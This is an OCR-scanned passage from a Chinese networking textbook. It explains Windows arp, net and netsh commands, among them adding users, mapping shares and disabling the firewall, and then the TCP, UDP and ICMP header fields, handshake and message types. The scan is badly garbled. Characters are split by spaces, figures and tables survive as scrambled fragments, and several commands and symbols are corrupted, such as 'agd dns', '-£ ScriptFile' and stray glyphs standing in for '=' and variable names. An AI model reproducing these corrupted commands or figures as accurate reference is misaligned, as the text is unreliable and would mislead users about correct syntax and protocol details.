(3) 要 将 下 地 址 10. 0. 0. 80 与 物理 地 址 00-AA-00-4F-2A-9C 绑 定 (静态 ARP 缓存 项 ): 
arp -s 10.0.0.80 00-AA- 00- 4F- 2A- 9C 

(4) 删除 所 有 接口 的 ARP 缓存 表 : 

arp -d 


值得 注意 的 是 ,在 IPv6 协议 下 ,已 经 取消 了 ARP 协议 , 代 之 以 NDP( 邻 居 发 现 ) 协 议 。 
i 


1.1.6 ”net 命令 


net 命令 是 功能 强大 的 命令 行 工 具 , 它 包含 了 管理 网 络 环境 .服务 用户、 登录 等 
Windows 中 大 部 分 重要 的 管理 功能 。 使 用 net 可 以 管理 本 地 或 者 远程 计算 机 的 网 络 环境 ， 
以 及 各 种 服务 程序 的 运行 和 配置 ,或 者 进行 用 户 管理 和 登录 管理 等 。net 命令 所 执行 的 功 
能 都 可 以 在 相应 的 图 形 界 面 上 完成 。 

在 Windows 中 ,net 命令 的 语法 如 下 : 


net [ accounts | computer | config | continue | file | group | help | helpmsg | 


localgroup | pause | session | share | start | statistics | stop | time | use | 


user | 
其 中 : 
accounts 


computer 


config 


file 


group 


help 
helpmsg 
localgroup 


pause 


session 
share 


start 


statistics 
stop 


time 


user 
View 
在 net 命令 中 
0 


View ] 


将 用 户 账户 数据 库 升级 并 修改 所 有 上 账户 的 密码 和 登录 请 求 。 

从 域 数 据 库 中 添加 或 删除 计算 机 ,所 有 计算 机 的 添加 和 删除 都 会 转发 到 
主 域 控制 器 。 

显示 当前 运行 的 可 配置 服务 ,或 显示 并 更 改 某 项 服务 的 设置 。 更 改 立 即 
生效 并 且 是 永久 的 。 

显示 某 服务 器 上 所 有 打开 的 共享 文件 名 及 锁定 文件 数 。 该 选项 也 可 以 关 
闭 个 别 文件 并 取消 文件 锁定 。 

在 Windows NT Server 域 中 添加 、 显 示 或 更 改 全 局 组 。 该 选项 仅 在 
Windows NT Server 域 中 可 用 。 

提供 网 络 命令 列表 及 帮助 主题 .或 提供 指定 命令 或 主题 的 帮助 。 
提供 错误 信息 的 帮助 。 

添加 、 显 示 或 更 改 本 地 组 。 

暂停 一 个 Windows 服务 。 和 暂停 服务 只 是 使 该 服务 处 于 等 待 状态 ,而 不 是 
从 内 存 中 删除 软件 。 

列 出 或 断 开本 地 计算 机 和 与 之 连接 的 客户 端的 会 话 。 

创建 .删除 或 显示 共享 资源 。 

启动 服务 .或 显示 已 启动 服务 的 列表 。 如 果 服 务 名 是 两 个 或 两 个 以 上 的 
词 ,如 Net Logon 或 Computer Browser, 则 必须 用 双 引 号 (") 引 住 。 
显示 本 地 工作 站 或 服务 器 服务 的 统计 记录 。 

停止 网 络 服务 。 

使 计算 机 的 时 钟 与 另 一 台 计 算 机 或 域 的 时 间 同 步 。 不 带 /set 参数 使 用 
时 ,将 显示 另 一 台 计 算 机 或 域 的 时 间 。 

连接 计算 机 或 断 开 计 算 机 与 共享 资源 的 连接 ,或 显示 计算 机 的 连接 信息 。 
该 选项 也 控制 永久 网 络 连接 。 

添加 或 更 改 用 户 账 号 或 显示 用 户 账号 信息 。 

显示 域 列表 、 计 算 机 列表 或 指定 计算 机 的 共享 资源 列表 。 

,党 有 /yes 和 /no 选项 ,这 些 选项 可 缩写 为 /y 和 /n。 例 如 ,net stop server 


通常 提示 确认 要 停止 基于 服务 器 的 所 有 服务 ;而 net stop server /y 对 该 提示 自动 回答 yes， 
然后 服务 器 服务 关闭 。 

以 下 是 net 命令 的 一 些 使 用 实例 。 

(1) 建立 本 地 机 用 户 myuser, 口 令 为 159357 : 


net user myuser 159357 /add 
(2) 删除 本 地 机 用 户 myuser: 


net user myuser /delete 


(3) 建立 本 地 目录 c:\myshare 为 共享 目录 ,其 共享 名 为 myshare, 共 享 权限 为 只 读 , 访 
问 用 户 为 myuser: 


net share myshare=c:\myshare /GRANT:myuser,READ 


在 Windows 中 ,用 户 myuser 必须 是 存在 并 设置 有 密码 的 。 权 限 可 以 是 READ、 
CHANGE 或 FULL。 
(4) 删除 共享 名 myshare 的 共享 属性 : 


net share myshare /delete 

(5) 将 远程 计算 机 222. 168. 10. 10 的 共享 文件 夹 myshare 映射 为 本 地 z 盘 
net use z: \\222.168.10.10\myshare 

(6) 删除 映射 的 z 盘 : 


net use z: /del 


(7) 查看 目标 机 时 间 ,设置 本 地 计算 机 时 间 与 “目标 IP" 主 机 的 时 间 同 步 。 

查看 : 

net time \\192.168.1.10 

同步 : 

net time \\192.168.1.10 /set (加 上 参数 /yes 可 取消 确认 信息 ) 

只 有 执行 上 一 条 命令 才能 实现 两 台 主 机 的 时 间 同 步 。 
1.1.7 netsh 命令 

netsh(network shell, 网 络 外 壳 ) 是 Windows 系统 自 带 的 功能 强大 的 网 络 配置 命令 行 
工具 。 使 用 netsh 工具 ,可 以 查看 或 更 改 本 地 计算 机 或 远程 计算 机 的 网 络 配置 。 ee 
在 本 地 计算 机 上 运行 这 些 命令 ,而 且 可 以 在 网 络 上 的 远程 计算 机 上 运行 。netsh 提供 了 
本 功能 ,可 以 在 批 处 理 模式 下 针对 指定 的 计算 机 运行 一 组 命令 。 利 用 netsh ,五 二 


本 保存 为 文本 文件 ,便于 存档 或 用 于 配置 其 他 的 计算 机 。 
在 Windows 中 ,netsh 命令 的 语法 如 下 : 


netsh [-a AliasFile] [- c Context] [- RemoteMachine] [- u [DomainName\] UserName] [-p 


和 


Password | * ] [Command | - £ ScriptFile] 


其 中 : 
-a AliasFile 


-c Context 


-r RemoteMachine 


-u [Domain Name |UserName 


-p Password | * 


Command 
-{ ScriptFile 


运行 AliasFile 后 返回 到 netsh 提示 符 。AliasFile 指 
定 包含 一 个 或 多 个 netsh 命令 的 文本 文件 的 名 称 。 

更 改 到 指定 的 netsh 上 下 文 。Context 指定 netsh 上 
下 交 。 

指定 要 配置 的 远程 计算 机 ,RemoteMachine 用 名 称 或 
IP 地 址 来 指定 远程 计算 机 。 

指定 在 一 个 用 户 账 号 下 运行 netsh 命令 ， 
DomainName 指定 的 域 用 户 账 号 所 在 ,没有 指定 
DomainName 时 指 本 地 域 。 

指定 要 提供 密码 的 用 户 账 号 (由 -u UserName 指定 账 
号 ) 。* 表示 在 密码 提示 行 中 输入 密码 时 将 不 显示 该 
密码 。 

指定 要 运行 的 netsh 命令 。 

指定 运行 ScriptFile 文件 中 所 有 的 netsh 命令 。 
ScriptFile 是 指定 要 运行 的 脚本 ,运行 脚本 后 退出 


netsh. exe。 


进入 netsh 环境 后 ,在 根 级 目录 用 exec 命令 也 可 以 加 载 一 个 配置 脚本 。 对 winsock、 
routeras 等 网 络 服务 的 配置 也 可 以 通过 netsh 的 内 置 命令 操作 。 


例如 : 


C:\>netsh 
netsh>help 


可 显示 此 上 下 文中 的 命令 。 


netsh 在 上 线 (online) 模 式 下 的 配置 会 立刻 生效 ,而 在 下 线 (offline) 模 式 下 则 可 以 先进 
行 配置 ,检查 无 误 后 再 转换 到 上 线 模式 生效 ,这样 可 以 避免 不 必要 的 差错 。 

以 下 是 netsh 命令 的 一 些 使 用 实例 。 

(1) 用 netsh 配置 网 卡 的 IPv4 属性 ,如 图 1-1 所 示 , 步 又 如 下 。 


@ 配置 网 卡 IP, 格 式 如 下 : 


netsh interface ipv4 set address "本 地 连接 " static IP 地 址 子 网 掩 码 ”默认 网 关 ” 跃 点 数 
跃 点 数 是 指 默 认 网 关 的 路 点 数 , 一 般 为 1。 


netsh interface ipv4 set address "本 地 连接 " static 192.168.1.10 255.255.255.0 192. 


168.1.11 


如 果 不 配 置 网 关 , 可 用 默认 值 none。 例 如 192. 168. 1. 1 可 用 none 代替 。 


@ 配置 DNS: 


netsh interface ipv4 set dnsservers name= "本 地 连接 " source= static 202.116.64.1 


到 证 区 元 


辐 自 动 获得 下 地 址 0) 
侨 使 用 下 面 的 IP 地 址 G) 
JP 地 址 G): 

子 网 挤 码 们 ; 
默认 网 关中): 


自动 获得 DRS 服务 器 地 址 加 ) 
图 使 用 下 面 的 DNS 服务 器 地 址 E); 
首选 DRS 服务 器 中 ) 202 
备用 DNS 服务 器 以 ) 


退出 时 验证 设置 L) 


图 1-1 网 卡 IPv4 属性 
如 果 要 配置 备用 DNS, 可 将 set 改 为 add。 
@ 删除 DNS: 
netsh interface ip delete dns "本 地 连接 " all 
删除 网 关 : 
netsh interface ip delete address "本 地 连接 " gateway=all 


(2) 用 netsh 配置 网 卡 IPv6, 如 图 1-2 所 示 ,步骤 如 下 。 
〇 配置 IPv6 地 址 ， 


netsh interface ipv6 add address "本 地 连接 " FE80: :2 
@ 配置 IPv6 DNS: 
netsh interface ipv6 agd dns "本 地 连接 " FEC0:0:0:FFFF::1 


(3) 查看 本 地 网 卡 配 置 : 


netsh interface ip show address 
netsh interface ip show config 
netsh interface ip show interface 
netsh interface ip show ipaddress 
netsh interface ip show ipnet 


netsh interface ip show dns 


显示 IP 地 址 配置 

显示 网 络 参数 详细 信息 

显示 IP 接 口 统计 

显示 当前 IP 地址 

显示 IP 的 网 络 到 介质 的 映射 
显示 DNS 服务 器 地 址 


在 Windows 中 .netsh interface ip show address 命令 可 以 只 显示 出 IPv4 的 地 址 配置 。 


人 


ee 人 全 ~_※_G 


常规 


人 


IPw6 地 址 上 : 
子 阿 前 绢 长 度 0) 
默认 网 关 O) 


首选 DRS 服务 器 了) ; 
备用 DNS 服务 器 A) 


加 


退出 时 验证 设置 L) 


人 自动 获取 IPv6 地 址 0) 
人 图 使 用 以 下 IPw6 地 址 6) 


自动 获得 DRS 服务 器 地 址 B) 
图 使 用 下 面 的 DNS 服务 器 地 址 下 ) 


以 自动 获取 分 本 的 IP6 设置 。 否 则 ， 您 需要 向 网 络 管理 员 咨 


fec0:0:0:EEEE: :1 


(4) netsh 的 防火 墙 管理 命令 。 
外 ,也 可 以 利用 netsh 强大 的 防火 墙 


netsh firewall 


参数 如 下 : 

EE 

add 

delete 

dump 

help 

reset 

set 

show 

add allowedprogram 
add portopening 
delete allowedprogram 
delete portopening 

set allowedprogram 
set icmpsetting 

set logging 

set multicastbroadcastresponse 
set notifications 


。14 。 


图 1-2 网 卡 IPv6 属性 


Windows 有 自 带 的 防火 墙 , 除 通 常 的 图 形 界面 管理 以 


命令 ,其 命令 格式 如 下 : 


显示 命令 列表 。 

添加 防火 墙 配 置 。 

删除 防火 墙 配 置 。 
显示 一 个 配置 脚本 。 

显示 命令 列表 。 

将 防火 墙 配置 重 置 为 默认 值 。 
设置 防火 墙 配置 。 

显示 防火 墙 配置 。 

添加 防火 墙 允许 的 程序 配置 。 
添加 防火 墙 端口 配置 。 
删除 防火 墙 允许 的 程序 配置 。 
删除 防火 墙 端口 配置 。 

设置 防火 墙 允 许 的 程序 配置 。 
设置 防火 墙 ICMP 配置 。 
设置 防火 墙 记录 配置 。 

设置 防火 墙 多 播 / 广 播 响应 配置 。 
设置 防火 墙 通知 配置 。 


set opmode 设置 防火 墙 操作 配置 。 


set portopening 设置 防火 墙 端口 配置 。 

Set service 设置 防火 墙 服务 配置 。 

show allowedprogram 显示 防火 墙 允许 的 程序 配置 。 
show config 显示 防火 墙 配置 。 

show currentprofile 显示 当前 防火 墙 配置 文件 。 
show icmpsetting 显示 防火 墙 ICMP 配置 。 

show logging 显示 防火 墙 记 录 配 置 。 

show multicastbroadcastresponse 显示 防火 墙 多 播 / 广 播 响 应 配置 。 
show notifications 显示 防火 墙 通知 配置 。 

show opmode 显示 防火 墙 操 作 配 置 。 

show portopening 显示 防火 墙 端口 配置 。 

show service 显示 防火 墙 服务 配置 。 

show state 显示 当前 防火 墙 状 态 。 

例如 : 

netsh firewall show allowedprogram // 显 示 防 火 墙 允 许 的 程序 配置 
netsh firewall show config // 显 示 防 火 墙 配置 

netsh firewall show currentprofile // 显 示 当 前 防火 墙 配 置 文 件 
netsh firewall show icmpsetting // 显 示 防 火 墙 ICMP 配置 
netsh firewall show logging // 显 示 防 火 墙 记录 配置 

netsh firewall show multicastbroadcastresponse // 显 示 防 火 墙 多 播 / 广 播 响应 配置 
netsh firewall show notifications // 显 示 防 火 墙 通知 配置 

netsh firewall show opmode // 显 示 防 火 墙 操作 配置 

netsh firewall show portopening // 显 示 防 火 墙 端口 配置 

netsh firewall show service // 显 示 防 火 墙 服务 配置 

netsh firewall show state // 显 示 当 前 防火 墙 状态 

netsh firewall reset // 防 火 墙 复位 

netsh firewall set opmode mode=disable // 关 闭 防火 墙 

netsh firewall set opmode mode=ENABLE // 开 启 防火 墙 允 许 例外 


命令 行 管理 方式 有 功能 强大 、 可 定制 性 比较 强 、 使 用 基本 不 受 限 制 .不 需要 进入 图 形 界 
面 的 优点 。 命 令 行 还 有 一 大 好 处 是 可 以 通过 命令 建立 批 处 理 文件 ,这 一 点 是 图 形 界面 所 不 
具有 的 ,应 该 熟练 掌握 ,灵活 使 用 。 


1.2 TCP/ UDP/ ICMP 协议 


TCP、UDP、ICMP 协议 是 TCP/IP 协议 族 中 的 协议 ,TCP、UDP 工作 于 传输 层 ,ICMP 
工作 于 网 络 层 。TCP 为 两 台 主 机 上 的 应 用 程序 提供 可 靠 的 端 到 端的 数据 通信 ,包括 把 应 用 
程序 交 给 它 的 数据 分 成 数据 块 交 给 网 络 层 、 确 认 接 收 到 的 分 组 等 。UDP 则 为 应 用 层 提 供 不 
可 靠 的 数据 通信 , 它 只 是 把 数据 包 的 分 组 从 一 台 主 机 发 送 到 另 一 台 主 机 ,不 保证 数据 能 到 达 
另 一 端 。 所 有 的 TCP .UDP ICMP 数据 都 以 IP 数据 包 格 式 传输 。 


全 


了 


TCP 协议 


TCP 提供 一 种 面向 连接 的 、 全 双 工 的 可靠 的 字 节 流 服务 。 在 一 个 TCP 连接 中 , 仅 有 
两 方 进行 彼此 通信 。 广 播 和 多 播 不 能 用 于 TCP。 

TCP 的 接收 端 必须 丢弃 重复 的 数据 。 采 用 自 适应 的 超时 及 重 传 策略 ,可 以 对 收 到 的 数 
据 进 行 重新 排序 ,将 收 到 的 数据 以 正确 的 顺序 交 给 应 用 层 。TCP 通过 下 列 方式 来 提供 可 靠 
性 : 应 用 数据 被 分 割 成 TCP 认为 最 适合 发 送 的 数据 块 , 称 为 报 文 段 或 段 。 


到 


TCP 报 文 的 传输 过 程 


TCP 报 文 的 传输 过 程 如 图 1-3 所 示 。 


2, 


TCP 向 发 送 缓存 从 接收 缓存 
发 送 缓存 | 写 入 数据 块 读 取 数 据 块 | | 接收 缓存 
DR 上 >》… [站 投 届 | 


图 1-3 TCP 报 文 的 传输 过 程 


TCP 协议 报 文 格式 


TCP 协议 报 文 格式 如 图 1-4。 

TCP 数据 段 以 固定 格式 的 20B 头 部 开始 ,在 头 部 的 后 面 是 一 些 选项 和 填充 字 节 (以 满 
足 32B 要 求 ) 。 在 选项 后 面 才 是 数据 ,其 最 长 为 65535 一 20(IP 头 ) 一 20(TCP 头 ) 王 65495B。 
不 带 数 据 的 头 部 常用 作 确 认 报 文 和 控制 报 文 。 

TCP 报 文 首部 各 字段 意义 如 下 : 


源 端口 和 目的 端口 字段 : 各 占 2B。 端 口 是 传 输 层 与 应 用 层 的 服务 接口 ,每 个 主机 可 
自行 决定 分 配 自己 的 端口 (从 256 号 起 ) 。 传 输 层 的 复 用 和 分 用 功能 都 要 通过 端口 
才能 实现 。 

序号 字段 : 占 4B。TCP 连接 中 传送 的 数据 流 中 的 每 一 个 字 节 都 编 上 一 个 序号 。 序 
号 字段 的 值 则 是 本 报 文 段 所 发 送 的 数据 的 第 一 个 字 节 的 序号 。 

确认 号 字段 : 占 4B, 是 期 望 收 到 对 方 的 下 一 个 报 文 段 的 数据 的 第 一 个 字 节 的 序号 。 
数据 偏 移 字段 : 占 4b. 它 指出 TCP 报 文 段 的 数据 起 始 处 距离 TCP 报 文 段 的 起 始 处 
有 多 远 。“ 数 据 偏 移 ” 的 单位 不 是 字 节 而 是 32b 字 ( 即 以 4B 为 计算 单位 ) 。 

保留 字段 : 占 6b, 保 留 为 今后 使 用 ,但 目前 应 置 为 0。 

控制 位 : URG 十 ACK 十 PSH 十 RST 十 SYN 十 FIN, 其 意义 如 表 1-1 所 示 。 
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32b 


位 0 8 16 24 31 
| | | L LI | | 11 I LIL | | | 1 LILIL | | | llL L L L 
下 
源 端口 目的 端口 
序号 
- 20B 
TCP Wi 站 5 er 
首部 | | 数据 保留 |Ricls|sly | 窗口 
偏 移 GIK|HITININ 
检验 和 | 紧急 指针 
| 选项 (长 度 可 变 ) 填充 


TCP 报 文 段 TCP 首 部 TCP 数 据 部 分 


图 1-4 TCP 协议 报 文 格式 


表 1-1 TCP 控制 位 


控 制 位 意义 

URG( 紧 急 位 | 当 URG 一 1 时 ,表明 紧急 指针 字段 有 效 。 它 告诉 系统 此 报 文 段 中 有 紧急 数据 ,应 尽 忆 
”| 传送 (相当 于 高 优先 级 的 数据 ) 

ACK( 确 认 位 ，| 只 有 当 ACK 一 1 时 确认 号 字段 才 有 效 。 当 ACK 一 0 时 ,表示 确认 号 被 省 略 , 数 据 段 不 


包含 确认 信息 


PSH( 标 志 位 ) | 表示 带 有 PSH 标志 的 数据 可 立即 送 往 应 用 程序 ,而 不 必 等 到 缓冲 区 装 满 时 才 传 送 


当 RST==1 时 ,表明 TCP 连接 中 出 现 严重 差错 (如 由 于 主机 崩溃 或 其 他 原因 ), 必 须 释 


RST 及 位 位 》 | 放 连 接 ,然后 再 重新 建立 传输 连接 
SR 同步 比特 SYN 置 为 1, 就 表示 这 是 一 个 连接 请 求 或 连接 接受 报 文 。 在 连接 请 求 时 ， 
S 司 步 位 ) 


SYN==1,ACK 一 0; 在 连接 响应 时 SYN=1.,ACK=1 


用 来 释放 一 个 连接 。 当 FIN=1 时 ,表明 此 报 文 段 的 发 送 端的 数据 已 发 送 完毕 ,并 要 
FIN( 终 止 位 ) | 求 释放 传输 连接 。 然 而 当 断 开 连 接 后 ,进程 还 可 以 继续 接收 数据 ,保证 连接 建立 和 断 
开 的 数据 段 可 按 正确 顺序 处 理 


。 窗口 字段 : 占 2B。 窗 口 字段 用 来 控制 对 方 发 送 的 数据 量 , 单 位 为 字 节 。TCP 连接 
的 一 端 根据 设置 的 缓存 空间 大 小 确定 自己 的 接收 窗口 大 小 ,然后 通知 对 方 以 确定 对 
方 的 发 送 窗口 的 上 限 。 当 字段 值 为 0 时 ,表示 它 已 收 到 所 有 发 送 的 数据 段 ,但 当前 
接收 方 急需 暂停 ,希望 此 刻 不 要 再 发 送 。 

。 检验 和 : 占 2B。 检 验 和 字段 检验 的 范围 包括 首部 和 数据 这 两 部 分 .“ 检 验 和 ?是 为 
确保 高 可 靠 性 而 设置 的 ,在 计算 检验 和 时 ,要 在 TCP 报 文 段 的 前 面 加 上 12 字 节 的 
伪 首 部 。 当 接收 方 对 整个 数据 段 ( 包 括 “ 检 验 和 ”字段 ) 进 行 运 算 时 ,其 结果 应 为 0。 
伪 首 部 包含 源 和 目的 主机 的 IP 地 址 、TCP 的 协议 编号 和 TCP 数据 段 ( 包 含 TCP 
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头 ) 的 字 节 数 。 在 检验 和 计算 中 包括 伪 首 部 ,有 助 于 检测 传送 的 分 组 是 否 正 确 。 

。 紧急 指针 字段 : 占 16b。 紧 急 指 针 指 出 在 本 报 文 段 中 的 紧急 数据 的 最 后 一 个 字 节 的 
序号 。URG 提醒 接收 方 在 TCP 数据 流 中 有 一 些 紧 急 数据 ,而 紧急 指针 指出 它 的 具 
体位 置 。 

。 选项 字段 : 长 度 可 变 。TCP 首部 可 以 有 多 达 40B 的 可 选 信 息 , 用 于 把 附加 信息 传递 
给 终点 ,或 用 来 对 齐 其 他 选项 。 在 建立 连接 期 间 , 收 发 双方 均 声明 其 最 大 载荷 能 力 ， 
会 选择 较 小 的 作为 标准 。 如 果 某 台 主 机 未 选择 该 项 ,其 默认 值 为 536B。 所 有 因 特 
网 上 主机 均 要 求 具有 接收 长 为 536 十 20 王 556B 的 TCP 数据 段 的 能 力 。 

。 填充 字段 : 这 是 为 了 使 整个 首部 长 度 是 4B 的 整数 倍 。 

TCP 报 文中 的 控制 位 URG、ACK、PSH、RST、SYN FIN 在 网 络 扫描 ,操作 系统 探测 中 

有 重要 作用 。 

3. TCP 的 传输 连接 管理 

TCP 是 面向 连接 的 协议 ,提供 透明 、 可 靠 的 数据 流传 输 。 传 输 连接 有 3 个 阶段 , 即 连接 

` 数 据 传送 和 连接 释放 。 传 输 连接 的 管理 就 是 使 传输 连接 的 建立 和 释放 都 能 正常 地 

进行 。 

在 TCP 的 连接 建立 过 程 中 要 解决 3 个 问题 : 首先 要 使 每 一 方 能 够 确 知 对 方 的 存在 ,其 

次 要 允许 双方 协商 一 些 参数 (如 最 大 报 文 段 长 度 、 最 大 窗口 大 小 、 服 务 质量 等 ) ,最 后 能 够 对 

传输 实体 资源 (如 缓存 大 小 、 连 接 表 中 的 项 目 等 ) 进 行 分 配 。 

4. 客户 /服务 器 方式 

TCP 的 连接 和 建立 都 是 采用 客户 /服务 器 方式 。 主 动 发 起 连接 建立 的 应 用 进程 叫 作 客 
户 (client)。 被 动 等 待 连接 建立 的 应 用 进程 叫 作 服 务 器 (server)。 用 三 次 握手 建立 TCP 连 
接 , 如 图 1-5 所 示 。 


KK 


主机 A 主机 B 
主动 打开 被 动 打开 
连接 请 求 SYN, SEQ=x 
SYN, ACK, SEQ=y, ACK=x+1 
一 确认 
确认 ACK, SEQ=x+1, ACK=y+1 a 


图 1-5 TCP 建立 连接 的 三 次 握手 过 程 


1) TCP 连接 建立 

A 的 TCP 向 B 发 出 连接 请 求 报 文 段 ,其 首部 中 置 同步 比特 SYN==1, 并 选择 序号 xz, 表 
明 传 送 数据 时 的 第 一 个 数据 字 节 的 序号 是 xz。 

B 的 TCP 收 到 连接 请 求 报 文 段 后 ,如 同意 , 则 发 回 确认 。B 在 确认 报 文 段 中 应 置 
SYN=1, 其 确认 号 应 为 zx 十 1. 同 时 也 为 自己 选择 序号 y。 

人 A 收 到 此 报 文 段 后 ,向 B 给 出 确认 ,其 确认 号 应 为 > 十 1。 

A 的 TCP 通知 上 层 应 用 进程 ,连接 已 经 建立 。 

当 运 行 服务 器 进程 的 主机 B 的 TCP 收 到 主机 A 的 确认 后 ,也 通知 其 上 层 应 用 进程 , 连 
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接 已 经 建立 。 

TCP 的 连接 建立 过 程 被 形象 地 称 为 “三 次 握手 ”过 程 。 

2) TCP 连接 释放 

在 数据 传输 结束 后 ,通信 的 双方 都 可 以 发 出 释放 连接 的 请 求 。TCP 连接 的 释放 是 两 个 
方向 分 别 释放 连接 ,每 个 方向 上 连接 的 释放 ,只 终止 本 方向 的 数据 传输 。 

当 一 个 方向 的 连接 释放 后 ,TCP 的 连接 就 称 为 “ 半 连 接 ” 或 “ 半 关 闭 ”。 当 两 个 方向 的 连 
接 都 已 释放 ,TCP 连接 才 完 全 释放 。 

3) TCP 连接 释放 的 过 程 

TCP 连接 释放 的 过 程 如 图 1-6 所 示 。 

主机 A 主机 B 


号 


应 用 进程 释放 连接 FIN, SEQ=x 通知 主机 
A 不 再 发 送 报 文 ” 应 用 进 


ACK, SEQ=y, ACK=x+1 


确认 


FIN, ACK, SEQ=y, ACK=x+1 5 让 


ACK, SEQ=xr+l, ACK=y+1 


图 1-6 TCP 连接 释放 的 过 程 


4) TCP 正常 的 连接 建立 和 关闭 的 过 程 

TCP 正常 的 连接 建立 和 关闭 的 过 程 如 图 1-7 所 示 。 

TCP 的 TCP 连接 释放 过 程 被 形象 地 称 为 "四 次 挥手 "过 程 。 

TCP 协议 是 主机 与 网 络 扫描 方法 的 思想 源泉 ,其 主要 技术 点 就 是 基于 TCP 的 三 次 所 
手 协议 。 而 TCP 协议 的 6 个 控制 位 更 是 被 黑客 们 发 挥 得 淋 注 尽 致 ,无 所 不 用 其 极 。 详 见 第 
2 章 内 容 。 


1.2.2 UDP 协议 


UDP 是 用 户 数据 报 协议 ,提供 无 连接 的 数据 报 文 传输 ,不 能 保证 数据 完整 到 达 目 的 地 。 

1. UDP 报 文 的 传输 过 程 

UDP 报 文 的 传输 过 程 如 图 1-8 所 示 。 

2. UDP 协议 报 文 格式 

UDP 协议 报 文 格式 如 图 1-9 所 示 。 

UDP 数据 传输 不 需要 预先 建立 连接 ,传输 过 程 中 没有 报 文 确认 信息 。 因 此 ,UDP 报 文 
格式 比 TCP 的 报 文 格式 简单 得 多 。UDP 数据 报 也 是 由 首部 和 数据 两 部 分 组 成 的 ,其 首部 
只 有 源 端口 .目的 端口 、 消 息 长 度 和 校 验 和 4 部 分 .各 部 分 的 意义 和 TCP 首部 对 应 字段 的 意 
义 相同 。 


i 


客户 进程 


号 


(主动 打开 )SYN_SENT 


服务 器 进程 


SYN, SEQ=x 


号 


LISTEN( 被 动 打开 ) 


一 | SYN_RCVD 
SYN, ACK, SEQ=y, ACK=x+1 TC 
ESTABLISHED ~ 一 
ESTABLISHED ACK, SEQ=r+1, ACK=p+1 
-| ESTABLISHED 
ee (全 双 工 数据 传送 阶段 ) ls 
(主动 关闭 )FIN_WAIT_1 FIN, SEQ=u 
一 CLOSE_WAIT( 被 动 关闭 ) 
ACK, SEQ=v, ACK=u+1 GOSE ACK 
FIN_WAIT 2 |—— 
|- 
| 数据 传输 
FIN, ACK, SEQ=v, ACK=u+1 a 
TIME_WAIT |—— 
时 ACK, SEQ=ut1, ACK=v+1 
TIME_WAIT | 


图 1-7 TCP 正 常 的 连接 建立 和 关闭 过 程 


接收 端 


数据 数据 
J | 下 
不 可 靠 信道 
使 用 UDP 协议 
图 1-8 UDP 报 文 的 传输 过 程 
32b 
位 0 8 16 24 31 
| | | | ee) GE | | | | | 本 | 有 | | Ee | 二 
源 端口 目的 端口 
长 度 检验 和 8B 
数据 (可 变 长 ) 


Bis 


图 1-9 UDP 协议 报 文 格式 


端口 号 表示 发 送 进程 和 接收 进程 ,长 度 表示 UDP 数据 报 的 长 度 为 多 少 字 节 , 检 验 和 防 
止 UDP 数据 报 在 传输 中 出 错 。 
著名 的 QQ 聊天 软件 就 是 使 用 了 UDP 协议 。 使 用 TCP 和 UDP 协议 的 各 种 应 用 和 应 
层 协 议 如 表 1-2 所 示 。 
表 1-2 使 用 TCP 和 UDP 协议 的 各 种 应 用 和 应 用 层 协 议 


酒 


应 用 应 用 层 协 议 传输 层 协议 
名 字 转 换 DNS 
选 路 协议 RIP 
网 络 管理 SNMP 
UDP 
网 络 文件 服务 NFS 
IP 电话 专用 协议 
流 式 多 媒体 通信 专用 协议 
邮件 传输 SMTP 
远程 登录 TELNET 
TCP 
超 文本 传输 HTTP 
文件 传输 FTP 


1.2.3 ”ICMP 协议 


ICMP(Internet Control Message Protocol ,网 际 控制 报 文 协 议 ) ,通过 它 可 以 知道 故障 
的 具体 原因 和 位 置 。 由 于 IP 不 是 为 可 靠 传输 服务 设计 的 ,ICMP 的 目的 主要 是 用 于 在 
TCP/IP 网 络 中 发 送出 错 和 控制 消息 。ICMP 的 错误 报告 只 能 通知 出 错 数据 包 的 源 主机 ,而 
无 法 通知 从 源 主 机 到 出 错 路 由 器 途中 的 所 有 路 由 器 ( 环 路 时 )。ICMP 数据 包 是 封装 在 IP 
数据 包 中 的 。 

1， ICMP 协议 报 文 格式 

ICMP 协议 报 文 格式 如 图 1-10 所 示 。 

32b 


位 0 8 16 24 31 
| | 上 上 上 1 | | 1 上 1 | 上 L | 上 1 上 1 上 | | 1 上 | 1 上 | | 


类 型 代码 校 验 和 


(这 4B 取 决 于 ICMP 报 文 的 类 型 ) 


ICMP 数 据 ( 长 度 取决 于 类 型 ) 


图 1-10 ICMP 协议 报 文 格式 


2. ICMP 数据 包 类 型 
ICMP 报 文 有 3 大 类 , 即 ICMP 差错 报告 报 文 、 控 制 报 文 .请 求 / 应 答 报 文 。 各 大 类 型 报 
4 启 


文 又 分 多 种 类 型 报 文 。 如 图 1-11 所 示 ,其 报 文 类 型 见 表 1-3。 
信息 不 可 到 达 报告 
差错 报告 报 文 超时 报告 
数 出 错 报告 


差错 与 控制 源 站 抑制 报 文 
报 文 协议 控制 报 文 
ICMP 重 定向 报 文 


回应 请 求 /应 答 报 文 

请 求 /应 答 报 文 上 二 一 | 时 稚 请 求 /应 答 报 文 
地 址 掩 码 请 求 /应 答 报 文 
图 1-11 ICMP 数据 包 类 型 


表 1-3 ICMP 报 文 类 型 
编号 类 型 


0 Echo Reply( 回 应 应 答 ) 


类 型 
Timestamp( 时 间 惟 请 求 ) 
Timestamp Reply( 时 间 戳 回复 ) 
Information Request( 信 息 请 求 ,此 类 型 已 弃 用 ) 
Information Reply( 信 息 回复 ,此 类 型 已 弃 用 ) 
Address Mask Request( 地 址 掩 码 请 求 ) 
Address Mask Reply( 地 址 掩 码 回复 ) 


3 Destination Unreachable( 目 的 地 不 可 达 ) 
4 Source Quench( 源 站 抑制 ) 


5 Redirect( 重 定向 ) 


8 Echo( 请 求 回应 ) 


11 Time Exceeded( 超 时 ) 


12 Parameter Problem( 参 数 问题 ) 


1) ICMP 差错 报告 报 文 

ICMP 差错 报告 报 文 用 来 报告 错误 ,是 一 个 差错 报告 机 制 。 它 为 遇 到 差错 的 路 由 器 提 
供 了 向 最 初 源 站 报告 差错 的 办 法 , 源 站 必须 把 差错 交 给 一 个 应 用 程序 或 采取 其 他 措施 来 纠 
正 问题 。 该 类 报 文 分 为 信息 不 可 达 报 告 .超时 报告 .参数 出 错 报告 3 种 形式 。 

2) 控制 报 文 

(1) 源 站 抑制 报 文 : 当 路 由 器 收 到 太 多 的 数据 报 ,以 致 没有 足够 的 缓冲 区 来 处 理 时 ,路 
由 器 放弃 到 达 的 额外 数据 报 ,使 用 ICMP 源 站 抑制 报 文 向 初始 源 网 点 报告 拥塞 ,并 请 求 它 减 
慢 目前 的 数据 报 发 送 速率 。 

